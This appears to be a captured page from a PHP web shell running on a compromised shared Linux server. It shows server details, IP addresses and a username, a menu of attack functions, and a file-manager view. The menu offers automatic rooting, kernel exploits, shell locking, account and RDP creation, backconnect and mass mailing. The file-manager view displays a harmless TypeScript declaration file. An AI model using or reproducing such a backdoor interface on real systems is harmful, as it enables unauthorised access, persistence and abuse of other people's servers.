Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
es-abstract /
[ HOME SHELL ]
Name
Size
Permission
Action
2015
[ DIR ]
drwxr-xr-x
2016
[ DIR ]
drwxr-xr-x
2017
[ DIR ]
drwxr-xr-x
2018
[ DIR ]
drwxr-xr-x
2019
[ DIR ]
drwxr-xr-x
5
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
operations
[ DIR ]
drwxr-xr-x
GetIntrinsic.d.ts
73.32
KB
-rwxr-xr-x
es2015.d.ts
7.7
KB
-rwxr-xr-x
es2016.d.ts
8
KB
-rwxr-xr-x
es2017.d.ts
8.05
KB
-rwxr-xr-x
es2018.d.ts
8.45
KB
-rwxr-xr-x
es2019.d.ts
8.66
KB
-rwxr-xr-x
es5.d.ts
3.1
KB
-rwxr-xr-x
es6.d.ts
67
B
-rwxr-xr-x
es7.d.ts
67
B
-rwxr-xr-x
index.d.ts
1.55
KB
-rwxr-xr-x
package.json
988
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : es5.d.ts
import type { GenericDescriptor as ESGenericDescriptor, AccessorDescriptor as ESAccessorDescriptor, DataDescriptor as ESDataDescriptor, PropertyDescriptor as ESPropertyDescriptor, } from './index'; interface ES5 { readonly 'Abstract Equality Comparison': typeof import('./5/AbstractEqualityComparison'); readonly 'Abstract Relational Comparison': typeof import('./5/AbstractRelationalComparison'); readonly 'Strict Equality Comparison': typeof import('./5/StrictEqualityComparison'); readonly CheckObjectCoercible: typeof import('./5/CheckObjectCoercible'); readonly DateFromTime: typeof import('./5/DateFromTime'); readonly Day: typeof import('./5/Day'); readonly DayFromYear: typeof import('./5/DayFromYear'); readonly DaysInYear: typeof import('./5/DaysInYear'); readonly DayWithinYear: typeof import('./5/DayWithinYear'); readonly FromPropertyDescriptor: typeof import('./5/FromPropertyDescriptor'); readonly HourFromTime: typeof import('./5/HourFromTime'); readonly InLeapYear: typeof import('./5/InLeapYear'); readonly IsAccessorDescriptor: typeof import('./5/IsAccessorDescriptor'); readonly IsCallable: typeof import('./5/IsCallable'); readonly IsDataDescriptor: typeof import('./5/IsDataDescriptor'); readonly IsGenericDescriptor: typeof import('./5/IsGenericDescriptor'); readonly IsPropertyDescriptor: typeof import('./5/IsPropertyDescriptor'); readonly MakeDate: typeof import('./5/MakeDate'); readonly MakeDay: typeof import('./5/MakeDay'); readonly MakeTime: typeof import('./5/MakeTime'); readonly MinFromTime: typeof import('./5/MinFromTime'); readonly modulo: typeof import('./5/modulo'); readonly MonthFromTime: typeof import('./5/MonthFromTime'); readonly msFromTime: typeof import('./5/msFromTime'); readonly SameValue: typeof import('./5/SameValue'); readonly SecFromTime: typeof import('./5/SecFromTime'); readonly TimeClip: typeof import('./5/TimeClip'); readonly TimeFromYear: typeof import('./5/TimeFromYear'); readonly TimeWithinDay: typeof import('./5/TimeWithinDay'); readonly ToBoolean: typeof import('./5/ToBoolean'); readonly ToInt32: typeof import('./5/ToInt32'); readonly ToInteger: typeof import('./5/ToInteger'); readonly ToNumber: typeof import('./5/ToNumber'); readonly ToObject: typeof import('./5/ToObject'); readonly ToPrimitive: typeof import('./5/ToPrimitive'); readonly ToPropertyDescriptor: typeof import('./5/ToPropertyDescriptor'); readonly ToString: typeof import('./5/ToString'); readonly ToUint16: typeof import('./5/ToUint16'); readonly ToUint32: typeof import('./5/ToUint32'); readonly Type: typeof import('./5/Type'); readonly WeekDay: typeof import('./5/WeekDay'); readonly YearFromTime: typeof import('./5/YearFromTime'); } declare namespace ES5 { type GenericDescriptor = ESGenericDescriptor; type AccessorDescriptor<T = unknown> = ESAccessorDescriptor<T>; type DataDescriptor<T = unknown> = ESDataDescriptor<T>; type PropertyDescriptor<T = unknown> = ESPropertyDescriptor<T>; } declare const ES5: ES5; export = ES5;
Close